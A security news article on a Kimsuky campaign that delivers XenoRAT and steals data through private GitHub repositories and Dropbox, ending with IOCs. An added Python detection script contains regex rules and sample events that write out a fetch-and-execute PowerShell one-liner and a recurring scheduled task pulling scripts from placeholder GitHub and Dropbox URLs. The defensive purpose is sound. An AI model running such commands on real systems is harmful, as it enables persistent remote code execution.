North Korean Hackers Exploit GitHub Infrastructure for Malware Delivery

A sophisticated threat campaign leveraging GitHub’s infrastructure has been attributed to the North Korean state-backed threat group Kimsuky (aka APT43).

Security analysts have uncovered a series of targeted spearphishing attacks against South Korean entities, in which private GitHub repositories and Dropbox links serve as the primary vehicles for delivering malware, including custom versions of XenoRAT and credential-stealing scripts.

Figure: A post on X mentioning the malware

Technical Analysis Reveals Kimsuky’s Abuse

The attack chain frequently begins with highly tailored emails, impersonating trustworthy organizations such as South Korean law firms or financial authorities.

PDF documents and PowerShell-based scripts, distributed as malicious email attachments, serve as initial infection vectors.

Upon execution, these scripts download additional payloads from attacker-controlled Dropbox or GitHub repositories.

Notably, the threat actors have hardcoded valid GitHub Personal Access Tokens (PATs) within their malware, enabling seamless access to private repositories without raising suspicion.

Security telemetry indicates the existence of at least five distinct private GitHub repositories (e.g., “hole_311”, “star”, “hole_408”) storing both malware payloads (such as .NET-obfuscated XenoRAT binaries disguised as RTF files) and data exfiltrated from victims.

Figure: Compression class identified in the XenoRAT source code

Some repositories also house decoy documents tailored to the targeted organizations, further enhancing the credibility of spearphishing lures.

Variants of these repositories were observed to manage fileless infections via scheduled tasks, which recurrently fetch and execute PowerShell scripts from GitHub.

The main infostealer writes system and process information to disk and uploads it to the attackers’ private repositories, together with keylogs and clipboard data for selected infections.

Spearphishing Campaigns Orchestrated

A unique aspect of these operations is the use of “repo-scope” GitHub PATs, granting attackers flexible read/write access to their infrastructure.

Logging analysis revealed systematic uploads from compromised endpoints, test logs originating from both public and private IP addresses, and the reuse of infrastructure across several campaigns dating back to at least March 2025.

The identified C2 architecture is similarly adaptive: the malware can fetch updated payloads from GitHub or Dropbox and contact multiple command-and-control nodes, many of which were linked to known Kimsuky infrastructure.

Advanced obfuscation techniques were employed to hinder reverse engineering, including resource-based string decryption and state machine-based code flow in .NET assemblies.

The identification of shared GUIDs and mutex names across multiple malware samples enabled researchers to correlate recent activity with previous campaigns, such as the MoonPeak operation, further solidifying attribution to Kimsuky.

The technical analysis exposed indicators of compromise (IOCs) spanning malicious scripts, C2 domains, Dropbox distribution URLs, mutex values, and unique email addresses used for repository management.

Examination of spearphishing content, commit logs, and infrastructure elements strongly points to a persistent targeting of South Korean legal, financial, and cryptocurrency-related sectors.

This campaign illustrates a growing trend: North Korean threat actors are increasingly abusing legitimate cloud services, particularly developer and file-sharing platforms, for both malware delivery and data exfiltration, thereby complicating detection and takedown efforts.

Organizations are urged to monitor for signs of unauthorized repository access, scrutinize email attachments (especially password-protected archives), and enforce strong endpoint controls to detect anomalous PowerShell or scheduled task activity.
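A defender-side check for the behaviour described in this article (PowerShell fetching payloads from GitHub or Dropbox, hardcoded GitHub PATs, recurring scheduled tasks), written here as an added Python example that is not from the article or the researchers. The event texts, the ghp_ token, the repository name and the URLs are constructed placeholders, not indicators from the campaign.

```python
import re

# Payload hosts the campaign used: GitHub (raw content / API) and Dropbox.
FETCH_HOSTS = re.compile(
    r"raw\.githubusercontent\.com|api\.github\.com|dl\.dropboxusercontent\.com|dropbox\.com", re.I)
# PowerShell download primitives and in-memory execution primitives.
DOWNLOAD_PRIMS = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|DownloadFile|Net\.WebClient", re.I)
EXEC_PRIMS = re.compile(r"Invoke-Expression|\biex\b|-EncodedCommand|-enc\b", re.I)
# GitHub token formats: classic PATs start with ghp_, fine-grained ones with github_pat_.
GITHUB_TOKEN = re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")
AUTH_HEADER = re.compile(r"Authorization\W+(?:token|Bearer)\s", re.I)
# Task creation plus a repetition interval = the recurring fetch loop the article describes.
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I)
TASK_REPEAT = re.compile(r"/sc\s+minute|/sc\s+hourly|-RepetitionInterval", re.I)

def analyze(text: str) -> list:
    """Return the reasons a script block or task action resembles a cloud-hosted fileless loader."""
    reasons = []
    fetches = bool(DOWNLOAD_PRIMS.search(text))
    if fetches and FETCH_HOSTS.search(text):
        reasons.append("downloads from GitHub/Dropbox content host")
    if fetches and EXEC_PRIMS.search(text):
        reasons.append("download chained into in-memory execution")
    if GITHUB_TOKEN.search(text) or AUTH_HEADER.search(text):
        reasons.append("hardcoded GitHub credential (private-repo access)")
    if TASK_CREATE.search(text) and TASK_REPEAT.search(text):
        reasons.append("recurring scheduled task (persistence/beacon loop)")
    return reasons

def scan(events: dict) -> dict:
    """Map event id -> reasons for every event that triggered at least one rule."""
    hits = {}
    for event_id, text in events.items():
        reasons = analyze(text)
        if reasons:
            hits[event_id] = reasons
    return hits

# Constructed sample events (hypothetical repo, URL and token; not real indicators).
# Keys mimic Windows event sources: 4104 = PowerShell ScriptBlock text, 4698 = task created.
SAMPLES = {
    "4104-A": "$h=@{Authorization='token ghp_" + "A" * 36 + "'}; "
              "iex (irm -Headers $h https://raw.githubusercontent.com/example-org/example-repo/main/s2.ps1)",
    "4104-B": "Get-ChildItem C:\\Users | Export-Csv users.csv",
    "4698-C": 'schtasks /create /sc minute /mo 30 /tn Updater /tr "powershell -w hidden '
              '-c iex (iwr https://dl.dropboxusercontent.com/s/EXAMPLE/u.ps1)"',
}

if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLES).items():
        print(event_id, "->", "; ".join(reasons))
```

In practice the same rules would be run over PowerShell ScriptBlock logging (event 4104) and scheduled-task creation events (4698) collected centrally, with a token match treated as a high-severity finding regardless of the other rules.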

Indicators of Compromise (IOC)

MD5 Hashes: a56edfef94008c77abfb4e151df934d9, 30d5f17d5e3f85be18220a7cab0b9fff, 5e9a80d3d4f71ecd8bf8e579a5e2449c, f51a2ccb4b9b2bf163c81b525bfac08e, …
C2 IPs: 80.71.157[.]55, 158.247.253[.]215, 165.154.78[.]9, 139.99.36[.]158, 118.194.249[.]201, 158.247.202[.]109, 45.61.161[.]103, 101.36.114[.]190, 216.244.74[.]115
Dropbox URLs: https://dl.dropboxusercontent[.]com/scl/fi/c6ba7iwuke57d75j3mmte/eula.rtf?rlkey=t0jnirhxk48xdu8p74rqgv9dw&st=oofgjsq8&dl=0, …
Mutex Names: Dansweit_Hk65, Cheetah_0716
Email: [email protected]
.NET GUID: 12DE1212-167D-45BA-1284-780DA98CF901


Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.
